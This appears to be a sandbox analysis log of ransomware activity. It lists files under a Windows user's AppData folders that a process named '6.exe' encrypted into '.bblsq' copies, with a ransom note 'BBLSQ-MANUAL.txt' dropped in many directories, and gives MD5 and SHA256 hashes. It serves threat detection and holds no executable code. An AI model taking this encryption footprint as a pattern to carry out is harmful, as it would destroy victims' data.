SHA256: 231cee3173d164e6e20b88ae17755f352641e4cb1391a6c5048a3e455eee71f0
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm.bblsq
binary
MD5: 88dcaa689a6421d95a86b98fff1a3db2
SHA256: 2c97a089023ca912afbc04804b7d115c4afe2b2dbda7775e32e02b80652cafbb
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(inch).wmf.bblsq
binary
MD5: d9b06bb56b91b1d69d2af3a9998b37ab
SHA256: 10fcb39e8cd3c966503cde3a757386953d37f55f40d14f5ddeae3a092f9265b1
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(cm).wmf.bblsq
binary
MD5: 3eb29a8b3153299a2f4f0bb040c82f88
SHA256: a775ceacc828dc3f1cd27d3c5b82254c44ec95d03c352d308c26d31a28e096ea
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.bblsq
binary
MD5: c20c60f5d59cd3f328711031c7aeec15
SHA256: 65868ce425d28ab1e67a802ea969e80ebe1c47070e83b9e8f8a0814bb473282c
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(inch).wmf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(cm).wmf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_1.emf.bblsq
binary
MD5: 210c29987890e2178ce23ba52e3e538f
SHA256: 11bce3f17d94e1d0854938dbb37b1b7c3234a7de7cc57d912a9eead43415982d
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_2.emf.bblsq
binary
MD5: a7f3b4d40f611a71d176cbfac8f64183
SHA256: 248f0bd54612a5a9bf57d752f425a2a3a23cd60907a31ccf4316a8701ee101e6
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Graph.emf.bblsq
binary
MD5: d9b5cd8d4dcabd7a84ca3d17f4f2f997
SHA256: 87d595f333600f9de20b965fef980347c3fc046a51a3d931a677dd56a331dcac
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_2.emf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Graph.emf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_1.emf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm.bblsq
binary
MD5: 130fbf8dec14bf67f3f92630d05cdacf
SHA256: 641eb10258628359557b33b40d502bca031004c1e9b572c17056d8c235989f52
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.bblsq
prg
MD5: 187c31cf4a6aa810b7e47af68ca016d5
SHA256: 5e562d91f54c7cee2505913e1d2a43efbb64dfb9175c160ae78eff8162abf9a0
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif.bblsq
binary
MD5: a23d5935aa410dd6378f6f894a651d61
SHA256: f6a8e316af1bd0c35ed01641edf05d37dcdfff15b2c3a2ea59a9d1df2ab03795
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif.bblsq
binary
MD5: c67a7f5eea997bb8e1ba2dc8baf17cee
SHA256: 5c22a998b6fe088f4ed200a6e9477a7dc46fd73a6d2f1c74ac0a9faf514ca945
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Dotted_Lines.emf.bblsq
binary
MD5: 7a5273cc2577573436fa5a6fec322969
SHA256: 779f10371af375dc06366bfeccd5fcceed37c4f81417666f7008f8de09ba3dd9
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Dotted_Lines.emf
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.bblsq
binary
MD5: ded2aa3fd55e5cfd66c3d5f352ae3829
SHA256: 18566e98919d0c82dd9bea245e8a835763fc4d2d0327145e32dc03f2d980e9c8
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.bblsq
binary
MD5: 6202453ff8255d6b1331fd5792380cde
SHA256: e5da4130c6281feb8ed338ce35298a523b820d84b4deb6fdd20432d3c1584af4
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm.bblsq
binary
MD5: 13ca142d636199338efc3bee1531bf07
SHA256: 1d45d045688d3ae1647d36ef7d95dd348b637600b4ed85831d9c75222860887f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\oeold.xml.bblsq
binary
MD5: 0ba47781916fb3d2aee0ed8fc58e7e63
SHA256: dd1a8520ba5a5a1aa8c2ebc119bb35a85ebf158fea5603596fd9d1331df8d0ca
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs.bblsq
binary
MD5: a45f134f47fa8a73e15b6c1d86dfd784
SHA256: ef4215b2cf5196c4f0d2996acd1e5bb0483f631ac6339253e458acc23b25a502
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\oeold.xml
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs.bblsq
binary
MD5: ad7c0b360b1940d569c6d79d1b798db4
SHA256: 99a622477fc136492ea2e218be73a8e566b001c3645581de668678b0da2e8e09
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb00001.log.bblsq
binary
MD5: 2c6d7493f12b2c9d937fc1b774aa2ee2
SHA256: 12c4fd7d169ff524aad82204893e854bfbfd7e3a39595e06f673d5b83d1f523c
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb00001.log
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.log.bblsq
binary
MD5: 539bbbb8a1911817301eaa5337a6822e
SHA256: 6150edb9142061318db0887446541a0b517d24a1fbc79253d3eb48989979455e
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.log
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat.bblsq
binary
MD5: 39ab6dd3a1fb1149d6d467c2ca56bae9
SHA256: 619d0a51641700a8626e9759946a9750515a942297db5556a3bdf6fb4e318030
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.chk.bblsq
binary
MD5: 1b06e9cf25a3d2d7772421045c7e6c56
SHA256: cf03312a69c0c45a0bdfb195f61b24043625cdd7d30bc687cf7c381d66da6e5e
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.chk
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore.bblsq
binary
MD5: 6efc1904687127d6f4a720b34a5ceb02
SHA256: 9fa7dca8c3ccb3e84fda61d834b40eb54e251a290f4cbd626e3345bf1af63d67
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log.bblsq
binary
MD5: be168355d07e9898c8ede4d8fed11c3c
SHA256: 00e5bd0619ba2e18613a1765380b358be76935bcd243008525a083a062e8c787
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{C6756DF7-BE4A-458E-9C7E-535BEC29FB9E}.oeaccount.bblsq
binary
MD5: 2d7a8dec7320835e51a38a1a6b332828
SHA256: e8a6357b4430b2f2a4274c9cdc758c6f5162f70a32131f5ed126ad499bf3d11e
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{A9BA3523-71CE-43CF-BD95-F75C31E87D1A}.oeaccount.bblsq
binary
MD5: 6f9629403497ca0f4e0cd904dbfcd3a0
SHA256: 96b53cc874435ec3f798ea2946af746a434c0ce931d8970e2b7fa5c77f86980f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{CBB626B1-8A75-4171-911F-13C42949168F}.oeaccount.bblsq
binary
MD5: 47d8c2e07fae65b5dc87b17a03d97afe
SHA256: d2ece18efff44f62d1ccaa07e64da6c17a341236fd798f8dfefbb8e1770dbea8
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{CBB626B1-8A75-4171-911F-13C42949168F}.oeaccount
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{C6756DF7-BE4A-458E-9C7E-535BEC29FB9E}.oeaccount
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{A9BA3523-71CE-43CF-BD95-F75C31E87D1A}.oeaccount
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\11_All_Pictures.wpl.bblsq
binary
MD5: 837437180348e8b06ad7f2bcbca53f79
SHA256: 1b7241de480a8be22e1c5ea9c24bac6f384f046987c8c546e24be476416b09b1
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\10_All_Music.wpl.bblsq
binary
MD5: f7d76e23ea6367f1cfd67d1697739af3
SHA256: 59f3ae8e62c091a6d3df20962956056859572cb2eb09cac1dd2e249f453b9ff2
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\12_All_Video.wpl.bblsq
binary
MD5: 853fd08c2d615265e4b8112d00214860
SHA256: 4ddd22dcaf531da62925ccc3aad0848c974d239e568c2274fa8f7cb125a70c07
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\10_All_Music.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\11_All_Pictures.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\12_All_Video.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\07_TV_recorded_in_the_last_week.wpl.bblsq
binary
MD5: 3393b175a466db40aff4df0a5a463a42
SHA256: f9c1c0e17503bfe992933c68a64fd2380e1af85b38c5e1816e5e211182ac3c08
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\09_Music_played_the_most.wpl.bblsq
binary
MD5: 1397f91fc6e4325a3c4c97158f69348c
SHA256: 84bde7af8d07a2b435c820ee7c048610ca8da343ed8f052df81e02fccf55a37f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\08_Video_rated_at_4_or_5_stars.wpl.bblsq
binary
MD5: 2a5838279737423c2537ec33de15c8ce
SHA256: beb0e918ee5532c44eddca031d0c6618a39fa8c41d3c7012bca717faa79f5f78
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\09_Music_played_the_most.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\07_TV_recorded_in_the_last_week.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\08_Video_rated_at_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\05_Pictures_taken_in_the_last_month.wpl.bblsq
binary
MD5: e632078d78cd0fe2c98418eedfc6e910
SHA256: 6e3d3529bc0ad0ff9e15bf68c4450589ede1cd1c1b6ef8c71443606ce905dbac
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\06_Pictures_rated_4_or_5_stars.wpl.bblsq
binary
MD5: e0a3d09081acb302d5f5fee7b65f9506
SHA256: 76ee4fcc61fe5810158eb59585140350a3e3dbf4fbeec27f1bd26d2314c42b89
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\04_Music_played_in_the_last_month.wpl.bblsq
binary
MD5: 9091b74548858e3f4ffec1c00776a6c9
SHA256: bcf4f8fd58cb57f0bc7a5dd257051f30753287192f5b431e3d312a330c6a397f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\04_Music_played_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\05_Pictures_taken_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\06_Pictures_rated_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\01_Music_auto_rated_at_5_stars.wpl.bblsq
binary
MD5: 9294b70bb9f7040171b4a95fadbee9b9
SHA256: 2ae18002b0852a8b95ac1c20a0c646c9a1436ed072168d7cdf776379b20fb6a6
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\03_Music_rated_at_4_or_5_stars.wpl.bblsq
binary
MD5: 0a7d319e1de50300ea3f9d6dc8dc0218
SHA256: c7194a62aa8fe1553ece8b980398075ce31640bb1e59c1508f9fe32a29afde30
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\02_Music_added_in_the_last_month.wpl.bblsq
binary
MD5: aaf8d5a460fac1c4847efed3651ba629
SHA256: 2b7d3e38131d65fada8d3007ffb07444e4d62e936051c8f8c7ff02f95f0693b6
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\03_Music_rated_at_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\02_Music_added_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\01_Music_auto_rated_at_5_stars.wpl
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb.bblsq
binary
MD5: 9ef0fcc3d3f61bb753a06cf6a43d9e1f
SHA256: 4e24e5c2cdbf42f37a4d37aa511523465b51cdcd0de01a73e41ed2643c092d2c
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb.bblsq
binary
MD5: da91ef46d912551adb6899c0a59fd3a3
SHA256: 4ecd3ed6b5b410126b7a45076565f22e75ce5917532ee91ca59d3748a8f30f56
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\VM3JD5NM\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.bblsq
binary
MD5: 9fc9fa5654c6ca516154fe8dc4e9e69d
SHA256: 18dd0462350f042d34801f233b86d27406b3a866daf085fd1c9b23ef9ed4b2a2
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\index.dat.bblsq
binary
MD5: 9d525e22ce2dfada364998376dfaccee
SHA256: d0183b8cf31bfb07fdd664ae1b5c2033b0311ab5e7d60f5bba12775ac5977a39
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\index.dat
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\9RI45C46\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\HPSK10OB\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms.bblsq
binary
MD5: 8c1e67bcdbc34efc6ca1b78b38e76a1e
SHA256: 10af3e71f93bcb33c1763cf12e69ae91c229520fac834b812401514df989f5db
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\G4PHTCUR\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms.bblsq
binary
MD5: 27c757cb3502e0ef7dc88848e9340aad
SHA256: 4cb858ad9cf18a6e1d0bca3a4c968f83f65f02c7d48944e6f38dace2b9da49bf
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms.bblsq
binary
MD5: 94f45d5e930190e0c46ad8ad581111be
SHA256: 01aed3d861828f4c4d29262312982ba9c42708aaa353308985c9c8059914e4a8
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms.bblsq
binary
MD5: bbed0c6d36b7b872bae68ab7e495a0e4
SHA256: ba2f79b611ea2c741c0ef3d55e0555b9a515940cccbeaf72b19199748a97a2c5
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms.bblsq
binary
MD5: f64a8f776361fc18384a3d78237f338a
SHA256: d72a46224ec6c4b499ee3fbe54e55b41c06ee427af7bcbefcf9d27a07b51152a
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\USA~dgov Updates~c News and Features~.feed-ms.bblsq
binary
MD5: 6c935f6728bf1964f4a1a4ad4620af86
SHA256: d652d8c89e2cc1868b11e6160f1e1b265e7091fdf877f1282f2093bc61df2072
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\USA~dgov Updates~c News and Features~.feed-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Credentials\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\Popular Government Questions from USA~dgov~.feed-ms.bblsq
binary
MD5: 45d5ec0b5e48c00a6c115ad5dfef21c5
SHA256: d3b66e540e9102aafa3420c520953705bc4f2c4c21584e1673a615380a175465
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
SHA256: 8d7f52ac9aca4b2143cbde8a120e49bb8d2332bcc4edce6c0d6158a0934c3d9f
2456
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\Feeds for United States~\Popular Government Questions from USA~dgov~.feed-ms
––
MD5:  ––
SHA256:  ––
2456
6.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.bblsq
binary
MD5: 7641c225203cde2abe56e721be91239d
SHA256: b1797777d9cb66b54504153f45d0baaa67043d1ed6af9f38a23ed2d627d184da
2456
6.exe
C:\Users\Administrator\BBLSQ-MANUAL.txt
text
MD5: 108c3f142c8ec885b99e7addaf7a9d16
